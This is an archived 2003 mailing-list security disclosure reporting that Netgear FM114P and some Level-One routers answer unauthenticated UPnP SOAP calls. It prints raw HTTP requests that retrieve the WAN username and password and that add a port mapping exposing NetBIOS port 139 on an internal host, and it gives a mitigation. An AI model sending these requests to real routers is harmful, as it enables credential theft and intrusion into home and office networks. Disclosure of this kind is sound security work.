RE: Another security problem in Netgear FM114P ProSafe Wireless Router firmware (also level-one)

From: Björn Stickler (
Date: 04/02/03

  • Next message: David F. Madrid: "Using Java from Javascript"
    From: Björn Stickler <>
    To: <>
    Date: Wed, 2 Apr 2003 22:57:57 +0200


    it seems that several routers from level-one are also vulnerable to the
    method described.
    and another nice feature is adding port mappings for passing through

    --- sample for passing port 139 (netbios) from internal ip ---

    POST /upnp/service/WANPPPConnection HTTP/1.1
    Content-Type: text/xml; charset="utf-8"
    SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
    User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
    Content-Length: 1123
    Connection: Keep-Alive
    Pragma: no-cache

    <?xml version="1.0"?>
    <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">
    <NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes"
    <NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
    <NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes"
    <NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
    <NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes"
    <NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes"
    <NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes"
    <NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes"

    regards, b.stickler

    -----Original Message-----
    From: Björn Stickler []
    Sent: Mittwoch, 2. April 2003 19:59
    To: ''
    Cc: ''

    i found another security problem in netgear prosafe wireless router model
    when remote-access and upnp features are enabled, the WAN connection
    username and password can be retrieved without any authentication using
    upnp. if remote management is enabled anyone can do this from the web. this
    is done by using upnp soap requests to the router with the functions
    GetUserName and GetPassword. i don´t know why such functions exist, because
    router configuration is normally done via web-interface.

    ---- begin of example request to get username --------------

    POST /upnp/service/WANPPPConnection HTTP/1.1
    SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
    CONTENT-TYPE: text/xml ; charset="utf-8"
    Content-Length: 289

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope s:encodingStyle=""
    xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />

    ---- end of example request to get username --------------

    affected firmware versions: --> v1.4 Beta Release 21 has been tested
                                --> all previous versions with upnp may be

    solution: disable remote management and/or upnp until bug is fixed by

    regards, b.stickler

  • Next message: David F. Madrid: "Using Java from Javascript"

    Relevant Pages

    • Re: OT: Vista Licence
      ... It has at least one killer feature - RDP7 performance is massively ... movie in this case) and passing a running bit-image of the screen. ... because there's a standard graphics 'instruction set' and the drivers are ...
    • Re: segfault w/ block, but not file scope
      ... >> specifically as a syntactic feature of a language. ... The phrase "passing a reference" describes the technique in question ... > linked lists, would you insist on not using the term "linked list" in ...
    • Re: OT- 2009 Celebrity Deaths
      ... TCM is currently running a short feature with some beautiful music ... showing the passing of popular stars from the past. ...
    • Re: Collecting gum ~ the dangers.
      ... "feature". ... have kept them instead of passing them on. ... like dots of gum. ...